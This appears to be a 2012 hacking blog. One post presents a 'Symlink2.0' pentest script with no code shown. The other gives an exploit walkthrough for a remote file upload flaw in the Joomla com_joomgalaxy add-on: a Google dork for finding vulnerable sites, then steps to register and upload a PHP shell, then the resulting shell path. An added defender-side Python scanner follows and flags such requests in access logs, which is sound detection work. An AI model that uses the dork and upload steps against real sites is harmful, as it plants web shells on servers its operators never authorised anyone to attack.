Thursday, 30 August 2012

Script Symlink2.0 for Pentesting

Hi,
The Symlink2.0 script is very useful in pentesting: it gives you a summary of the server's configuration, among other things.
The source code:


Sunday, 26 August 2012

Joomgalaxy Remote File Upload v1.2.0.5

Hi;
There is a new upload bug in the galaxy add-on of the Joomla CMS.
Dork: inurl:com_joomgalaxy

Exploitation:
First: you have to register on the site.
Example:
http://site/index.php?option=com_users&view=registration

Second:
Go to the following link and create a new post, then go to the icon input and upload your shell as follows: shell.php
http://site/index.php?option=com_joomgalaxy&view=addentry
Third:
Once the post is published, go to the images tab and upload your shell in the following way: shell.php
http://site//administrator/components/com_joomgalaxy/assets/images/entry_manager/1345590149_icon_shell.php

Enj0y
Ciao.
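
A defender-side check for the upload path described above, as an added example that is not part of the original post: it scans web-server access log lines for requests to script-like files under the component's image directory. The log lines, IP addresses and file names are constructed, and the extension list is an assumption about what the server would execute.

```python
import posixpath
import re
from urllib.parse import unquote

# Upload directory taken from the URL in the post above.
UPLOAD_DIR = "/administrator/components/com_joomgalaxy/assets/images/"
# Assumption: extensions a PHP-enabled server may execute, incl. "name.php.jpg".
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar|pht)(\.|$)")
# Client, method, target and status from a common/combined-format log line.
LOG_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

# Constructed sample log lines (documentation IP ranges, made-up file names).
_DIR = UPLOAD_DIR + "entry_manager/"
_FMT = '{} - - [01/Jan/2024:10:00:00 +0000] "{} {} HTTP/1.1" {} 512'
SAMPLE_LOG = [
    _FMT.format("203.0.113.7", "GET", "/" + _DIR + "0000000000_icon_test.php", 200),
    _FMT.format("198.51.100.4", "GET", _DIR + "0000000001_icon_photo.jpg", 200),
    _FMT.format("203.0.113.9", "GET", _DIR + "%2e%2e/entry_manager/0000000002_icon_test.PhP?x=1", 404),
    _FMT.format("198.51.100.4", "GET", "/index.php?option=com_joomgalaxy&view=addentry", 200),
    _FMT.format("203.0.113.7", "POST", _DIR + "0000000003_icon_test.php.jpg", 200),
]


def normalise(target):
    """Return the decoded, canonical, lower-cased path of a request target."""
    path = unquote(target.split("?", 1)[0])  # not urlsplit: "//a/b" would lose "a"
    path = re.sub(r"/{2,}", "/", path)       # the URL in the post has "//"
    return posixpath.normpath(path).lower()  # resolves "." and ".." segments


def is_script_in_upload_dir(target):
    """True if the request addresses a script-like file under UPLOAD_DIR."""
    path = normalise(target)
    return path.startswith(UPLOAD_DIR) and bool(SCRIPT_EXT.search(path.rsplit("/", 1)[-1]))


def scan(lines):
    """Return (ip, method, target, status) for every suspicious request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_script_in_upload_dir(m["target"]):
            hits.append((m["ip"], m["method"], m["target"], int(m["status"])))
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(*hit)
```

A hit with status 200 means the server answered for a script file in a directory that should only hold images; a 404 hit still records a probe worth correlating with earlier uploads from the same client.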